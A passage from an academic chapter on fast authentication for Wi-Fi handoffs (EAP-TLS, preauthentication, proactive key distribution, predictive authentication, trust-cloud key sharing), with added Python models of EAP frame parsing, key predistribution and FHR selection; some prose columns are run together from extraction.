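    """Raised for any frame that does not satisfy the EAP/EAP-TLS layout."""


def parse_eap(frame: bytes) -> dict:
    """Parse one EAP packet: Code(1) Identifier(1) Length(2) [Type(1) Data...]."""
    if len(frame) < 4:
        raise EapError("EAP header truncated")
    code, ident, length = struct.unpack("!BBH", frame[:4])
    if code not in EAP_CODES:
        raise EapError(f"unknown EAP code {code}")
    if length < 4 or length > len(frame):
        raise EapError("Length field does not match the frame")
    pkt = {"code": EAP_CODES[code], "id": ident, "length": length}
    if code in (3, 4):
        # Success and Failure are header-only: no Type, no data and, as the text
        # notes, nothing that lets the receiver check who produced them.
        pkt.update(type=None, data=b"", integrity_protected=False)
        return pkt
    if length < 5:
        raise EapError("Request/Response without Type byte")
    pkt.update(type=frame[4], data=frame[5:length])
    return pkt


def parse_eap_tls(pkt: dict) -> dict:
    """Split an EAP-TLS Request/Response into flags, optional total length and TLS data."""
    if pkt["type"] != EAP_TYPE_TLS or not pkt["data"]:
        raise EapError("not a well-formed EAP-TLS packet")
    flags, body, total = pkt["data"][0], pkt["data"][1:], None
    if flags & FLAG_L:
        if len(body) < 4:
            raise EapError("L flag set but TLS Message Length missing")
        total, body = struct.unpack("!I", body[:4])[0], body[4:]
    return {"L": bool(flags & FLAG_L), "M": bool(flags & FLAG_M),
            "S": bool(flags & FLAG_S), "tls_length": total, "tls": body}


class TlsReassembler:
    """Rebuilds one TLS message from EAP-TLS fragments, enforcing the declared size."""

    def __init__(self, max_len: int = 16384):      # policy limit, constructed value
        self.max_len, self.expected, self.buf = max_len, None, bytearray()

    def feed(self, frag: dict):
        """Return the full TLS message on the last fragment, None while more follow."""
        if self.expected is None:
            if not frag["L"]:
                if frag["M"]:
                    raise EapError("a fragmented message must start with L set")
                return frag["tls"]                  # unfragmented: no length needed
            if frag["tls_length"] > self.max_len:
                raise EapError("declared TLS length exceeds policy limit")
            self.expected = frag["tls_length"]
        self.buf += frag["tls"]
        if len(self.buf) > self.expected:
            raise EapError("fragments exceed the declared TLS length")
        if frag["M"]:
            return None
        if len(self.buf) != self.expected:
            raise EapError("last fragment received but message is short")
        out, self.expected, self.buf = bytes(self.buf), None, bytearray()
        return out


def build_eap_tls(code, ident, flags, tls_len, chunk):
    """Encode one EAP-TLS packet (used only to construct the samples below)."""
    length = struct.pack("!I", tls_len) if flags & FLAG_L else b""
    payload = bytes([EAP_TYPE_TLS, flags]) + length + chunk
    return struct.pack("!BBH", code, ident, 4 + len(payload)) + payload


def reassemble(frames):
    """Feed raw EAP frames through the parser and the reassembler."""
    r, out = TlsReassembler(), None
    for f in frames:
        out = r.feed(parse_eap_tls(parse_eap(f)))
    return out


def rejects(frames) -> bool:
    """True when the frame sequence is refused by the parser or reassembler."""
    try:
        reassemble(frames)
    except EapError:
        return True
    return False


# Constructed sample: a 1000-byte server message (e.g., a certificate chain) split
# over three EAP-Requests, the way it is sent when it exceeds the link MTU.
MESSAGE = bytes(range(256)) * 3 + bytes(232)
FRAGMENTS = [build_eap_tls(1, 7, FLAG_L | FLAG_M, len(MESSAGE), MESSAGE[:400]),
             build_eap_tls(1, 8, FLAG_M, 0, MESSAGE[400:800]),
             build_eap_tls(1, 9, 0, 0, MESSAGE[800:])]
# Constructed malformed sample: the fragments carry more than the declared 10 bytes.
OVERSIZED = [build_eap_tls(1, 7, FLAG_L | FLAG_M, 10, b"x" * 8),
             build_eap_tls(1, 8, 0, 0, b"y" * 8)]

if __name__ == "__main__":
    print(parse_eap(bytes([3, 9, 0, 4])))          # EAP-Success: header only
    print(len(reassemble(FRAGMENTS)), "bytes reassembled; oversized rejected:", rejects(OVERSIZED))
```

The reassembler trusts the declared TLS length only up to a local limit and refuses fragment sets that overrun or undershoot it, which is the check a supplicant or authenticator needs before handing the bytes to the TLS stack; the `integrity_protected` field on Success/Failure is there to make the chapter's point visible in the parsed output rather than to compute anything.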

Figure 2. EAP-TLS authentication messages, exchanged between the wireless device (supplicant), the wireless AP (authenticator) and the authentication server (e.g., RADIUS):

1. EAPOL-Start
2. EAP-Request Identity
3. EAP-Response Identity
4. EAP/TLS-Start
5. EAP/TLS: Chello
6. EAP/TLS: Shello, SCert, done
7. EAP/TLS: Cert, change cipher, finished
8. EAP/TLS: Change cipher, finished
9. EAP/TLS: Empty
10. EAP-Success

Steps 2 to 10 form the 802.1X authentication phase involving the delay; the 802.11i four-way handshake follows the EAP-Success.
• Supplicant: This is a user device seeking link layer connectivity with a network so that it can use the services offered by the network.
• Authenticator: This is the wireless AP providing link layer connections to the user devices. In any network, typically there will be many APs. The authenticator liaises with the authentication server by relaying information to and from the supplicant. When the authenticator receives a success message from the authentication server, it allows the supplicant to establish a link layer connection.
• Authentication server: This is a central server which helps the authenticator with the authentication decision based on what it knows about the supplicant and the information supplied by the supplicant.

As EAP, and in particular EAP-TLS, serves as the authentication building block for strong authentication security, we discuss briefly these technologies.

A. EAP: EAP communications are in the form of a challenge-response method. EAP uses four basic message types: EAP request, EAP response, EAP success, and EAP failure. After a few rounds of request and response exchange, the supplicant is notified of the outcome using EAP success or EAP failure. Regarding the transport of the authentication protocols used, as EAP does not have any addressing mechanism, EAP messages are encapsulated in the EAP over local area network (LAN) (EAPOL) protocol between the supplicant and the authenticator, and as a RADIUS message (EAP over RADIUS) between the authenticator and the authentication server.

B. TLS: Specified in RFC 2246; when used in 802.1X, the supplicant and the authentication server undergo a mutual authentication process. At the root of this process are certificates at both of these entities from a common certificate authority (CA). The results of the mutual authentication using these certificates are a strong master secret key (MK), and an initial pseudo-random function which will be used to generate additional keying material. Using this function and the MK, a pair-wise master key (PMK) is generated. The PMK further produces four pair-wise transient keys (PTKs) when used with particular cipher methods, which are used for origin authenticity and confidentiality of the four-way handshake procedure, as well as for data encryption.

Figure 2 shows the full EAP-TLS authentication steps and messages exchanged. At the end of a successful EAP-TLS authentication (EAP success message), there is a four-way handshake process which ensures that the AP and the MN are active, guarantees the freshness and synchronization of the shared encryption key, and binds the PMK to the medium access control (MAC) address of the MN.

Intradomain Fast Authentication Solutions

One of the most significant features of wireless networks is that they do not restrict users to a connection point (e.g., at a desk) while using the network. As long as the user is within the coverage area of a wireless access point or base station, the network connection stays alive. The predominant mobility-friendly applications are voice and multimedia, which can be supported when the user is continuously mobile. However, primarily due to this kind of mobility, the connections need to be switched from one access point to the next, a process called handoff, when the user crosses the coverage boundary of one AP and moves into the next one. Using 802.11i in wireless LANs, this means that the full EAP-TLS authentication has to be performed each time such a handoff occurs. It is well known that real-time applications, such as wireless voice over IP, have stringent delay requirements and can only tolerate moderate packet loss due to network outage occurring at handoffs. However, it has been reported that a full EAP-TLS authentication process can take as long as 1.1 seconds (Mishra et al., 2004), a number far too large to support the smooth operation of voice and multimedia applications in continuous mobility scenarios1. This number can only magnify when the RADIUS server is located topologically far from the AP. As the APs in wireless LANs have very small coverage2, many APs are required to be installed to cover a certain geographical area of a network. Thus, continuous mobility implies that there will be many handoffs during an active real-time application session, even when the user is within the same network (domain). There need to be mechanisms to cut down the authentication delay of 802.11i for this kind of intradomain handoff. Below we discuss the IEEE 802.11i proposed solution, and those found in the literature to tackle this issue.

Preauthentication

This is the solution specified within the IEEE 802.11i to support fast authentication at handoffs between

tions in wireless LANs, in the current form, no mechanism has been used to select the most likely handoff candidate APs. Thus, there will probably be many instances of preauthentications that will not be utilized at all. This is a waste of resources. Also, when there is a large number of candidate APs, this mechanism does not scale and, in addition, puts extra load on the AAA server. It is to be noted that the scope of the preauthentication is, however, limited to a single network domain or ESS, making it inapplicable in interdomain roaming scenarios.

Proactive Key Distribution

Proactive key distribution has been proposed as a mechanism to provide fast authentication at handoffs within the same administrative domain, by predistributing the keys to candidate APs in a neighbor graph (Mishra et al., 2004). Thus, this
APs in the same network domain or extended scheme avoids the involvement of the AAA or the
service set (ESS). In this solution, when an MN RADIUS server for distributing the keys to the
is connected with an old AP (oAP), it can initiate nAPs duringhandoffs.WhentheMNwillfinally
EAP-TLS authentication with a new AP (nAP) move to the nAP, the key will be already there and
within the same ESS by sending an IEEE 802.X the local handshake protocol (four-way handshake)
EAPOL-Start message via the oAP to the nAP. The can be used to establish the radio link between the
nAP then may initiate the EAP-TLS authentication MN and the nAP.
with the MN. The distributed system of the ESS The most important concept of this proposal is
has to be configured to forward the authentica- the use of the neighbor graph. The neighbor graph
tion messages to the oAP for the MN. While still isthedynamicidentificationofthe - mobilitytopol
connected with the oAP, preauthentication for the ogy of the network: a set of APs that the mobile
MN is performed by exchanging all the EAP-TLS user device potentially could reassociate to. The
authentication messages between the MN and the authors suggest that this set is typically a small
nAP. The process ends when after deriving the subset of all the APs in the wireless network. By
newPMK,thenAPsendsthefirstmessageofselecting the the possible candidate APs for handoffs by
four-way handshake to the MN. The MN and the a particular MN, the cost of proactively distributing
nAP must cache the new PMK to be used when the thekeytotheseAPsarejustifiedandminimized.
MN finally moves to the nAP. Preauthentication The scheme utilizes the concept of a reassociation
can be performed in advance to a group of APs relationship by which the authors mean that two
that the MN may select from, for handing off in APs have this relationship if it is physically pos-
the future. At time of handoff, there will not be sible for a given MN to handoff from one to the
any more EAP-TLS exchanges, and the four-way next. Thus, this relationship depends on factors
handshake can be used straight away to resume such as physical distance between two APs and
the connection process. placement of the APs. The authors suggest that the
While the preauthentication mechanism pro- neighbor graphs can be autonomously learned and
vides a great way to cut down the authentication maintained by the wireless network, and can be
delay necessary for supporting real-time applica- maintained either in a centralized or distributed


manner. In their implementation, the authors have stored this information in the centralized manner, in the RADIUS server.

The authors propose that instead of distributing the original PMK to all the neighbor graph APs, the PMK is used to derive PMKs depending on the instance of reassociation (e.g., nth reassociation) using a proposed equation. Special RADIUS messages have also been introduced to aid the key distribution process: NOTIFY-REQUEST, NOTIFY-ACCEPT, and ACCESS-ACCEPT. Once the MN completes a full EAP-TLS authentication, the AAA server sends a NOTIFY-REQUEST message to all the APs in the neighbor graph. This message informs the APs that a given MN may roam to their coverage. It is up to the APs to decide whether they want the security information (the PMK) for the MN. If the AP decides to get the security information at this stage, it sends a NOTIFY-ACCEPT message to the AAA server, and the AAA server sends an ACCESS-ACCEPT message in return to the AP containing the appropriate PMK and an authorization for the MN to remain connected to the network. From the experimental results, it has been shown that the average latency of the full authentication reduces to around 50ms from that of 1.1 second.

The scheme provides a practical and feasible way for maintaining the quality of real-time applications while the MN moves about in the same network. However, this imposes extra functionality and loads on the AAA server, because it has to send requests to candidate APs asking if they want the security key for the MN before it hands off to the APs. This centralized approach, where a single AAA server controls and manages the key distribution, will suit well the scenarios where the WLAN sites are all under the tight control of one central AAA server such that the server can derive and decide on the candidate APs for the MN's next move. This proposal will not be directly applicable to interdomain roaming scenarios.

The proposal from Mishra et al. (2004) has similarity with the preauthentication proposal from IEEE 802.11i in the sense that (some) steps of the authentication process are initiated even before the MN moves to the nAP, that is, the proactive nature of the schemes. The two proposals differ in the sense that in preauthentication, it is up to the MN to choose (using no particular guideline) APs in the network to complete authentication before it performs the next handoff, but in the case of the proactive key distribution scheme, only the APs in the neighbor graph can get the PMK (some APs in the neighbor graph may decide not to ask for the key at this stage). Also, the PMK predistribution scheme does not involve the MN in the process of distributing the PMKs to the neighbor graph APs, whereas the preauthentication scheme involves the MN to complete the preauthentication process with the nAPs.

Proactive Key Caching

An industry solution, namely proactive key caching (PKC), is an extension of Airespace Inc.'s [3] wireless enterprise platform, developed along with Funk Software [4] and Atheros Communications (Atheros Communications). In PKC, the MN can use the same master key to roam across an Airespace network, visiting one AP to the next. This eliminates the need for RADIUS authentication at each handoff; only the four-way handshake will be required. Airespace has a centralized policy engine for creating and maintaining security parameters across the entire enterprise. The use of the central policy engine in the network also leads this solution to be centralized and suitable only for a single administrative domain.

Predictive Authentication

This proposal from Pack and Choi (2002) is a predictive-authentication scheme based on the selection of a frequent handoff region (FHR) which works in a centralized manner. The main idea is to formulate a FHR consisting of a number of APs in a public access LAN by using a FHR selection algorithm, and taking into account the user mobility and traffic pattern. The FHR APs are the ones that the MN is likely to associate with in the near future. The MN is preauthenticated to all the APs within the FHR so that when the MN handoffs from one AP to the next within that FHR,

there is no time wasted in communicating with the RADIUS server.

The authors use the notion of movement ratio between APs which determines the handoff probability of a particular AP in the network. The movement ratio is affected by the user mobility and AP location. Movement ratio between APs can be measured by using an event logging system which logs the handoff information including login time and handoff times to different APs. Using a given equation and the log information, the handoff ratio is then calculated. To determine the FHR APs, the users' service level is considered as well. If the user can tolerate service disruptions during handoffs, fewer APs can be included in the FHR, and vice versa. Obviously, if there are more APs in the FHR, there will be more resources used for preauthenticating to them than if there were fewer APs in the FHR. Thus this differentiation based on service level serves an important purpose.

The key distribution in IEEE 802.1X has been modified to suit this scheme. Although the MN sends an authentication request to the AAA server via its current AP, the server sends the authentication response message (EAP success message) to APs in the FHR. The FHR APs keep the authentication information for the MN in soft state for a certain period, let us call it the preauthentication validity period. If the MN does not handoff within that period, the information is no longer useful and the MN will then have to perform a full authentication if it handoffs after that period to that AP. If the MN moves to an AP in the FHR within the preauthentication validity period, the reassociation with the new AP is fast as it only uses the exchange of a couple of messages locally between the AP and the MN.

This scheme has much similarity with the preauthentication scheme, with the difference being that the predictive authentication proactively authenticates to a group of APs that the MN is more likely to handoff to, rather than just any new or next APs in the network selected by the MN. Predictive authentication is also a centralized solution in that the MN does not have to decide which AP(s) to preauthenticate to; the network (the AAA server) takes charge of that decision.

INTERDOMAIN FAST AUTHENTICATION

Up until now, we have discussed proposals that are designed for reducing the authentication delay of the radio link layer establishment when a mobile device moves from one AP to the next within the same network administrative domain. While these are the most common handoffs, roaming such as in wireless hotspot areas served by multiple providers is becoming more common these days, especially in the CBD areas of big cities. For example, the CBD areas may be covered by small business owners such as Starbucks, big providers such as T-mobile, and nonprofit providers such as the city council. The wireless networks (hotspots) from these entities belong to different administrative domains. Consider the following scenario. There is an overlap between a public network in a coffee shop and a council-operated open wireless mesh network. The council is providing a free service to the public and the coffee shop provides access to paying customers. Despite the business model, for the success of these networks, they must consider supporting real-time session continuation, thus we would need solutions to make the authentication speedy in these multidomain handoff scenarios. Other network setups that would require this kind of solution can be residential neighborhood wireless networks, also known as community wireless networks as mentioned in the introduction section, where the neighbors want to share their broadband capacity over the wireless access networks they have at their individual premises. Such sharing has been envisioned by various researchers (e.g., Landfeldt, 2006; Thompson, 2006; Raniwala, 2005).

The solutions discussed so far cannot be directly applied to the interdomain handoff scenarios. The main reason is the tight administrative control that the individual domains operate in. The previous solutions also use central decision engines or centralized servers for key distribution, and so forth. Individual domains have their own mechanisms to manage handoffs, and would rather keep it to themselves. One network does not necessarily trust the other when it comes to access control. To address this gap, we have proposed a "trust-cloud" key sharing model (Hassan & Landfeldt, 2006).

Table 1. A comparison of the fast authentication schemes

Scheme Name | Initiated by | # of nAPs considered | nAP involvement | Applicability
Preauthentication | MN | Variable, selected by the MN | Decided by the MN | Intradomain handoffs
Proactive Key Distribution | RADIUS server | A subset of APs in the network; determined by the neighbor graph | Decided by the nAP concerned | Intradomain handoffs
Predictive Authentication | RADIUS server | A subset of APs in the network; determined by the FHR | Decided by the RADIUS server | Intradomain handoffs
Proactive Key Caching | Centralized policy engine | All APs in the network | Centralized policy engine | Intradomain handoffs

Trust-Cloud Key Sharing

According to our interdomain fast-authentication scheme based on a concept of "trust clouds," a trust cloud is formed among neighboring access points based on a relationship among the owners of the access points. The scheme enables fast and simple authentication for mobile devices that move between access points belonging to different administrative domains such as different ISPs. Used together with an appropriate routing scheme, the scheme enables continuous service of delay sensitive flows even while roaming between different access providers. We define the following terms:

Trust Link: A trust link defines the trust relationship between any two given RG [5]. RGi and RGj have a trust relationship between them if they agree to take part in key sharing for visiting mobile nodes between them.

Trust Cloud: A trust cloud is a collection of trust links for a given RG. Every RG has a different trust cloud. One RG can appear in many trust clouds, depending on its relationship with other RGs.

The model is a security key-sharing scheme which works on the basis of AP-to-AP (or RG-to-RG, network-to-network/hotspot-to-hotspot) trust. Unlike the implicit trust among the APs within a single administrative domain or an ESS, this trust is not implicit and is a translation from the trust among the AP-owners through a relationship with a third party such as an ISP or indeed through personal relationships if the community does not operate with a subscription-based model. For example, in community networks, the network operation is dictated by personal preferences, thus even if two AP-owners (or WLAN owners) share the same ISP, there is no guarantee that they would trust each other. This is the difference from neighborhood networks with federated networks such as FON.

In our model, the serving AP [6] of a visiting mobile node (VN) will share the key of the MN that is currently attached with it, within its trust cloud. So, depending on the number of APs in the serving AP's trust cloud, some of the APs in the hotspot area will have the key of the VN ready to be utilized for fast authentication when the VN hands off to one of these APs, and that AP will share the key further among its trust cloud APs.

In our model of interdomain access points, provider-provider (or AP-AP, or RG-RG) trust is not necessarily transitive: if RG X trusts RG Y and RG Y trusts RG Z, it does not necessarily mean that RG X trusts RG Z. Moreover, as this trust may have to do with personal preferences, it is not necessarily symmetric: RG X trusts RG Y does not necessarily mean that RG Y trusts RG X. Initially, we have simulated symmetry in the trust relationships between a given RG pair, and also that trust is not transitive as it depends on the relationship or understanding between any given pair of RGs (or RG-owners). This means that if RG X trusts RG Y, RG Y also trusts RG X. However, we have also simulated with the symmetry being relaxed, thus two RGs may have uni- or bi-directional trust relations, thus we deviate from a nondirected trust graph to a directed one. By using the concept
of trust clouds in the area, we will see pockets of fast authentication enabled coverage area, and not an entire coverage area of federated fast authentication areas. Therefore, we would still require the strong authentication mechanism provided by EAP-TLS in this setup as not all the handoffs will be able to utilize fast authentication.

The fast-authentication for interdomain sites is achieved through cooperation among the trust cloud members. The approach is distributed without a central authentication server being involved in distributing the security master key to the access points belonging to the trust cloud. We have proposed two algorithms for mobile visiting nodes to select RGs to perform authentication at handoffs: trust-aware and trust-unaware. In the trust-aware handoff algorithm, the MN needing to handoff to a new RG actively seeks to handoff to an RG that is trusted by its prior-move RG, thus it has to keep track of which RGs are trusted by its prior-move RG. In the trust-unaware handoff though, the MN just seeks to handoff to a suitable RG (e.g., an RG that has low load and can accept more connections) but does not care about the fast authentication possibility as the RG it hands off to may or may not be trusted by its prior-move RG.

Performance Evaluation

We have carried out simulation-based performance evaluation. The scenarios we model are a VN trying to complete a series of communication sessions by utilizing the unused capacity of nearby RGs within its wireless communication range (RG hotspot). There are a total of N RGs in the hotspot area. The VN can sense the current load of each RG from their beacons, and can only associate with an RG that is lightly loaded. An RG is modeled as a two-state Markov chain where the states of an RG alternate between heavily loaded and lightly loaded. The time spent in each state is exponentially distributed with means (L) selected to obtain a given fraction of time an RG spends in the heavily loaded state [7].

Figure 3. Full authentication vs. mean session time (S)

If an RG switches its state from lightly loaded to heavily loaded while a VN session is in progress through that RG, the VN session will have to handoff to another lightly loaded RG using one of the two trust cloud handoff algorithms, or the trustless one described in the previous section. If no lightly loaded RGs are available, the session is prematurely terminated.

The activity of the VN is modeled using the well known on-off process. When the VN completes a session, or a session is prematurely terminated, the VN enters a silence mode before initiating another session. The session and silence mode durations are exponentially distributed. Mean session duration is denoted by S. Once the VN enters the silence mode, its security association with a given RG becomes invalid (an inactivity timer is implemented within each RG, upon expiration of which the security associations of the VN become invalid). Consequently, the VN must go through the full security association process (full authentication involving the AAA server) at the start of each new session, even if it continues with the current RG.

The primary performance variable that we measure is the number of times a full authentication is needed for a session on average, since the goal is to reduce this variable. This number is basically one (for the initial association) plus the number of handoffs that require full authentication.

Figures 3 and 4 are two representative graphs from our simulation studies. First of all, we see that our trust-based handoff schemes, be it aware or unaware, achieve much lower per session full authentication than the usual no-trust or trustless
cases. Furthermore, Figure 3 shows a comparison of symmetric and symmetry-relaxed trust relations in a hotspot area covered by 20 RGs where links may or may not be symmetric. In this simulation, we have used the same trust probability value (P) of 0.2 for both symmetric and asymmetric scenarios (uniform trust probability). As this value is the same for all these cases, we see no difference in the performance. The impact of asymmetric trust relations comes into play when we consider different probability values in deciding trust links in the forward and backward directions for a given pair of RGs (nonuniform). The results then deviate from the case of the symmetric trust model. We can observe this in Figure 4 where we have selected two different trust probabilities for the forward direction (P1=0.2) and the backward direction (P2=0.1). In this figure, as the two trust probability values are very close to each other, although we see a difference between the asymmetric uniform and nonuniform cases, the differences are not large. We further simulated an asymmetric nonuniform trust model which we found achieved much lower full authentication per session. In the uniform cases, we used P=0.2, while in the nonuniform cases, we used P1=0.2 and P2=0.8. Thus we see that the handoffs benefit from the nonuniform asymmetric trust model as the probability values are different and the trust clouds improve because of the higher probability value P2.

Figure 4. Full authentication vs. mean session time (S): Trust symmetry relaxed

Open Issues

The trust-cloud model provides a conceptual way forward in solving the interdomain lengthy authentication issues. However, to make this concept a reality, much more work is required. For example, work is needed to solve issues and answer questions such as what governs trust between providers or APs when we are talking about fast connection administering from neighboring providers or APs, how to formulate the trust groups automatically and in a scalable manner, what is the feasibility of implementation of such solutions, and so on. We are currently focusing on these.

CONCLUSION

Current access control mechanisms in the standard for IEEE 802.11 wireless local area networks cannot support continuity of real-time streaming applications in mobile environments where the session has to handoff from one AP to the next. Handoffs involve delay in a few steps, one being the authentication process. In this chapter, we have provided a comprehensive guide on leading proposals for reducing the authentication delay. We have covered both inter- and intradomain fast-authentication solutions. Fast-authentication solutions are an integral part of making the AP-switching fast enough to support delay-constrained popular applications.

REFERENCES

Aboba, B., & Simon, D. (1999, October). PPP EAP TLS authentication protocol (RFC 2716).

Atheros Communications Inc. Retrieved February 9, 2007, from http://www.atheros.com/

Blunk, L., Vollbrecht, J., Aboba, B., Carlson, J., & Levkowetz, H. (2003, September). Extensible authentication protocol (EAP) (Internet Draft draft-ietf-eap-rfc2284bis-06.txt).
CISCO IP Phone. Cisco unified wireless IP phone 7920. Retrieved February 1, 2007, from http://www.cisco.com/en/US/products/hw/phones/ps379/ps5056/index.html

Hassan, J., & Landfeldt, B. (2006, June). Fast authentication in a collaborative wireless access network. Paper presented at the IEEE International Conference on Communications (ICC).

IEEE 802.1X. (2001, June). IEEE standard for local and metropolitan area networks: Port based network access control (IEEE Std. 802.1X-2001).

IEEE 802.11i. (2004, June). IEEE 802.11i: Wireless LAN medium access control (MAC) and physical layer (PHY) specifications: Medium access control (MAC) security enhancement.

Juniper Networks. Retrieved February 9, 2007, from http://www.juniper.net/

Mishra, A., Shin, M. H., & Arbaugh, W. A. (2004, February). Pro-active key distribution using neighbor graphs. IEEE Wireless Communications, 11(1), 26-36.

Pack, S., & Choi, Y. (2002, October). Pre-authenticated fast handoff in a public wireless LAN based on IEEE 802.1X model. Paper presented at the IFIP TC6/WG6.8 Working Conference on Personal Wireless Communications.

Rigney, C., Willats, W., & Calhoun, P. (2000a, June). Radius extensions (IETF Internet RFC 2869).

Rigney, C., Willats, S., Rubens, A., & Simpson, W. (2000b, June). Remote authentications dial in user service (RADIUS) (IETF Internet RFC 2865).

KEY TERMS

FHR: A group of wireless access points in a public access LAN to whom the predictive authentication will be performed (Pack, 2002). FHR is selected by using a FHR selection algorithm, and taking into account the user mobility and traffic pattern.

Handoffs: Changing network link-layer connection from one network access point or network port to another one.

IEEE 802.11: Also known as Wi-Fi, this is a set of standards for WLANs from the IEEE 802 working group 11.

IEEE 802.11i: An amendment to standard 802.11 to specify security mechanisms for Wi-Fi networks.

Neighbor Graph: A collection of APs that the mobile device is likely to handoff to in its next moves (Mishra, 2004).

Network Access Control: Used for security purposes. Network access control determines who (or which device) to give access to the network.

Trust Cloud: A trust cloud is a collection of trust links for a given access point or residential gateway (RG) (Hassan, 2006).

Trust Link: A trust link defines the trust relationship between any two given RG (Hassan, 2006).

Wireless Networks: Networks (of computers) that allow network nodes (e.g., user devices) to connect to the network infrastructure without any wire, typically using short range radio.

WLANs: Wireless local area networks. Local area networks that allow every computer to use a wireless LAN card with which it can communicate with other systems.
ENDNOTES

1. Typically, the overall latency of handoffs should not exceed 50ms.

2. For IEEE 802.11b, the coverage range is no more than 100-200 feet, as compared to the cellular coverage area in cities which is around 2640 feet, and more in the rural areas.

3. Airespace later was acquired by Cisco Systems (Cisco Systems Web site).

4. Funk Software has now been acquired by Juniper Networks (Juniper Networks).

5. In this section, RG, AP and wireless routers can be treated equally to mean wireless AP-type devices not belonging in the same domain, but to different domains.

6. In the interdomain handoff model, especially the trust-cloud model, the APs (or residential gateways, RGs, in the case of community networks) belong to different owners and domains. APs and RGs are also used interchangeably here.

7. L = Lh / (Lh + Ll), where Lh and Ll are the mean values for the sojourn times in the heavily and lightly loaded states, respectively.
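
The proactive key distribution scheme of Mishra et al. (2004) described above (NOTIFY-REQUEST, NOTIFY-ACCEPT and ACCESS-ACCEPT over a neighbor graph, with a PMK derived per reassociation) as an added, runnable model; this is example code, not the authors' implementation. The chapter does not give the PMK derivation equation, so the HMAC-SHA256 derivation is an assumption, as are the AP names, the neighbor graph and the mobile node's path.

```python
"""Proactive key distribution over a neighbor graph (Mishra et al., 2004), modelled.

Added example, not code from the chapter. The chapter says the PMK for the n-th
reassociation is derived from the master key "using a proposed equation" but does not
give it; the HMAC-SHA256 derivation below is an ASSUMPTION standing in for it. The
RADIUS message names and the latency figures are the ones quoted in the text.
"""
import hashlib
import hmac
import os
from dataclasses import dataclass, field

FULL_AUTH_MS = 1100   # full EAP-TLS, about 1.1 s (Mishra et al., 2004)
FAST_HANDOFF_MS = 50  # four-way handshake only, about 50 ms


def derive_pmk(mk: bytes, n: int, ap_id: str) -> bytes:
    """PMK for the n-th reassociation at ap_id (assumed derivation, see above)."""
    return hmac.new(mk, f"PMK|{n}|{ap_id}".encode(), hashlib.sha256).digest()


@dataclass
class AccessPoint:
    ap_id: str
    wants_keys: bool = True                         # local policy for NOTIFY-REQUEST
    pmk_cache: dict = field(default_factory=dict)   # mn_id -> (n, pmk)

    def on_notify_request(self, mn_id: str) -> bool:
        """True means the AP answers the AAA server with NOTIFY-ACCEPT."""
        return self.wants_keys

    def on_access_accept(self, mn_id: str, n: int, pmk: bytes) -> None:
        """ACCESS-ACCEPT delivers the PMK for the MN's n-th reassociation."""
        self.pmk_cache[mn_id] = (n, pmk)

    def four_way_handshake(self, mn_id: str, n: int, mn_pmk: bytes) -> bool:
        """Succeeds only if the cached PMK is for the same n and matches the MN's."""
        cached = self.pmk_cache.get(mn_id)
        return cached is not None and cached[0] == n and hmac.compare_digest(cached[1], mn_pmk)


@dataclass
class AAAServer:
    aps: dict                                        # ap_id -> AccessPoint
    neighbor_graph: dict                             # ap_id -> neighbour ap_ids
    master_keys: dict = field(default_factory=dict)  # mn_id -> MK

    def full_authentication(self, mn_id: str, ap_id: str) -> bytes:
        """Full EAP-TLS: fresh MK, PMK at the serving AP, then predistribution."""
        mk = self.master_keys[mn_id] = os.urandom(32)
        self.aps[ap_id].on_access_accept(mn_id, 0, derive_pmk(mk, 0, ap_id))
        self.predistribute(mn_id, ap_id, next_n=1)
        return mk

    def predistribute(self, mn_id: str, current_ap: str, next_n: int) -> list:
        """NOTIFY-REQUEST to every neighbour-graph AP; the PMK goes only to those that accept."""
        mk, delivered = self.master_keys[mn_id], []
        for nap_id in sorted(self.neighbor_graph.get(current_ap, ())):
            if self.aps[nap_id].on_notify_request(mn_id):
                self.aps[nap_id].on_access_accept(mn_id, next_n, derive_pmk(mk, next_n, nap_id))
                delivered.append(nap_id)
        return delivered


@dataclass
class MobileNode:
    mn_id: str
    aaa: AAAServer
    mk: bytes = b""
    n: int = 0            # reassociation counter, kept in step with the AAA server

    def associate(self, ap_id: str) -> int:
        """Initial association (or fallback): full authentication. Returns latency in ms."""
        self.mk, self.n = self.aaa.full_authentication(self.mn_id, ap_id), 0
        return FULL_AUTH_MS

    def handoff(self, nap_id: str) -> int:
        """Four-way handshake with the predistributed PMK if the nAP holds it, else EAP-TLS."""
        n = self.n + 1
        if self.aaa.aps[nap_id].four_way_handshake(self.mn_id, n, derive_pmk(self.mk, n, nap_id)):
            self.n = n
            self.aaa.predistribute(self.mn_id, nap_id, next_n=n + 1)
            return FAST_HANDOFF_MS
        return self.associate(nap_id)   # stale or missing PMK: back to the AAA server


def walk_latencies(neighbor_graph: dict, path: list, lazy_aps=frozenset()) -> list:
    """Per-hop latency for an MN following `path`; lazy_aps ignore NOTIFY-REQUEST."""
    aps = {a: AccessPoint(a, wants_keys=a not in lazy_aps) for a in neighbor_graph}
    mn = MobileNode("mn-1", AAAServer(aps, neighbor_graph))
    return [mn.associate(path[0])] + [mn.handoff(nap_id) for nap_id in path[1:]]


# Constructed neighbour graph: reassociation relationships among four APs.
GRAPH = {"A": {"B", "C"}, "B": {"A", "D"}, "C": {"A"}, "D": {"B"}}

if __name__ == "__main__":
    print(walk_latencies(GRAPH, ["A", "B", "D", "C"]))        # [1100, 50, 50, 1100]
    print(walk_latencies(GRAPH, ["A", "B"], lazy_aps={"B"}))  # [1100, 1100]
```

The last hop to C in the first walk falls back to a full authentication because C only holds the PMK derived for the first reassociation, which the MN has since moved past; the model therefore also shows why a stale predistributed key is no better than a missing one.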

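The predictive authentication scheme of Pack and Choi (2002) described above (movement ratios from a handoff log, service-level dependent FHR selection, and soft-state preauthentication with a validity period) as an added, runnable model; this is example code, not the authors' implementation. The chapter does not state the movement ratio equation, so the ratio (handoffs from i to j over all handoffs out of i), the per-service-level coverage targets, the log format and the log lines are constructed assumptions.

```python
"""Frequent handoff region (FHR) selection from handoff logs (Pack & Choi, 2002), modelled.

Added example, not the authors' code. The chapter says the movement ratio is computed
from logged handoff information "using a given equation" without stating it; the ratio
used here (handoffs i->j over all handoffs out of i), the service-level coverage targets
and the log format are ASSUMPTIONS. The log lines below are constructed.
"""
import re
from collections import Counter, defaultdict

LOG_RE = re.compile(r"event=handoff from=(?P<src>\S+) to=(?P<dst>\S+)")

# Assumed: share of a user's likely next moves that the FHR must cover, per service
# level. A user who tolerates disruption (bronze) gets fewer APs preauthenticated.
COVERAGE = {"gold": 0.95, "silver": 0.75, "bronze": 0.5}


def movement_ratios(log_lines) -> dict:
    """ratio[src][dst] = handoffs src->dst / all handoffs out of src (assumed equation)."""
    counts = defaultdict(Counter)
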